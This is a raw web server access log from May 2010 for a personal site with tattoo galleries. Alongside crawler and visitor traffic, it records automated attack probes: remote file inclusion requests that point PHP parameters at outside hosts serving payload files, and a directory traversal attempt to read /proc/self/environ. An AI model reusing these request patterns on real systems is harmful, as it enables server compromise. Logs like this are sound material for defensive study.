78.138.88.246 - - [05/May/2010:22:22:24 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
87.250.255.243 - - [05/May/2010:22:23:34 -0500] "GET /logs/access_log.1219968000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.232.85.247 - - [05/May/2010:22:24:39 -0500] "GET /logs//include.php?path[docroot]=http://fcg.com.pl/www/system2/tmp/aut2.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.232.85.247 - - [05/May/2010:22:24:40 -0500] "GET //include.php?path[docroot]=http://fcg.com.pl/www/system2/tmp/aut2.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
67.195.112.180 - - [05/May/2010:22:29:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [05/May/2010:22:29:01 -0500] "GET /logs/access_log.1167955200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.227 - - [05/May/2010:22:34:53 -0500] "GET /logs/access_log.1254873600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.234.252.102 - - [05/May/2010:22:36:23 -0500] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
205.234.252.102 - - [05/May/2010:22:36:23 -0500] "GET ////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
205.234.252.102 - - [05/May/2010:22:36:23 -0500] "GET /logs/access_log.1232150400////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
87.250.255.243 - - [05/May/2010:22:36:29 -0500] "GET /logs/access_log.1246838400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.90 - - [05/May/2010:22:37:53 -0500] "GET /logs/access_log.1241308800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.178 - - [05/May/2010:22:40:53 -0500] "GET /logs/access_log.1209859200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [05/May/2010:22:45:23 -0500] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
77.222.56.62 - - [05/May/2010:22:45:23 -0500] "GET //gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.222.56.62 - - [05/May/2010:22:46:25 -0500] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
77.222.56.62 - - [05/May/2010:22:46:25 -0500] "GET //gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
87.250.255.243 - - [05/May/2010:22:46:30 -0500] "GET /logs/access_log.1259020800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.225 - - [05/May/2010:22:56:22 -0500] "GET /logs/access_log.1162684800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [05/May/2010:22:56:30 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.39 - - [05/May/2010:22:59:23 -0500] "GET /logs/access_log.1265500800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.133 - - [05/May/2010:23:01:22 -0500] "GET /logs/access_log.1179187200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [05/May/2010:23:05:04 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.237 - - [05/May/2010:23:09:52 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.185.173.181 - - [05/May/2010:23:13:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:17 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:17 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:18 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:39 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:56 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:57 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:57 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:13:57 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.185.173.181 - - [05/May/2010:23:14:13 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
67.202.23.192 - - [05/May/2010:23:15:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
67.202.23.192 - - [05/May/2010:23:15:03 -0500] "GET /logs/access_log.1211328000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
87.250.255.243 - - [05/May/2010:23:16:33 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.232 - - [05/May/2010:23:22:53 -0500] "GET /logs/access_log.1262217600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [05/May/2010:23:25:02 -0500] "GET /logs/access_log.1245542400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [05/May/2010:23:32:14 -0500] "GET /logs/access_log.1254700800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.205 - - [05/May/2010:23:35:24 -0500] "GET /logs/access_log.1266278400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.180 - - [05/May/2010:23:40:40 -0500] "GET /logs/access_log.1218499200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [05/May/2010:23:40:50 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.179 - - [05/May/2010:23:43:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [05/May/2010:23:50:56 -0500] "GET /artwork/llpostcards.htm HTTP/1.1" 200 1147 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.251.10.117 - - [05/May/2010:23:52:38 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [05/May/2010:23:52:38 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
163.24.136.10 - - [05/May/2010:23:55:49 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
163.24.136.10 - - [05/May/2010:23:55:49 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
163.24.136.10 - - [05/May/2010:23:56:12 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
163.24.136.10 - - [05/May/2010:23:56:12 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [05/May/2010:23:58:26 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [06/May/2010:00:02:23 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.47.221.153 - - [06/May/2010:00:08:17 -0500] "GET /logs/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
212.47.221.153 - - [06/May/2010:00:08:17 -0500] "GET /?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.47.221.153 - - [06/May/2010:00:08:17 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.47.221.153 - - [06/May/2010:00:08:17 -0500] "GET /logs/access_log.1262390400/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.240.126.32 - - [06/May/2010:00:08:50 -0500] "GET /xGB.php?act=admin&do=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
72.240.126.32 - - [06/May/2010:00:08:50 -0500] "GET /logs/xGB.php?act=admin&do=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
72.240.126.32 - - [06/May/2010:00:08:50 -0500] "GET /logs/access_log.1264377600/xGB.php?act=admin&do=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.240.126.32 - - [06/May/2010:00:08:50 -0500] "GET /logs/access_log.1265155200/xGB.php?act=admin&do=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:00:12:25 -0500] "GET /logs/access_log.1252972800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [06/May/2010:00:15:45 -0500] "GET /logs/access_log.1268956800//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:15:45 -0500] "GET //index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:15:45 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:15:53 -0500] "GET /logs/access_log.1268956800//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:15:53 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:15:53 -0500] "GET //index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:06 -0500] "GET //index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:06 -0500] "GET /logs/access_log.1268956800//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:06 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:20 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:20 -0500] "GET /logs/access_log.1268956800//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:20 -0500] "GET //index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:24 -0500] "GET //index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:24 -0500] "GET /logs/access_log.1268956800%20%20//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:24 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:30 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:30 -0500] "GET //index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [06/May/2010:00:16:30 -0500] "GET /logs/access_log.1268956800%20%20//index2.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:18:31 -0500] "GET /logs/solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:18:31 -0500] "GET /solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:18:31 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:18:31 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
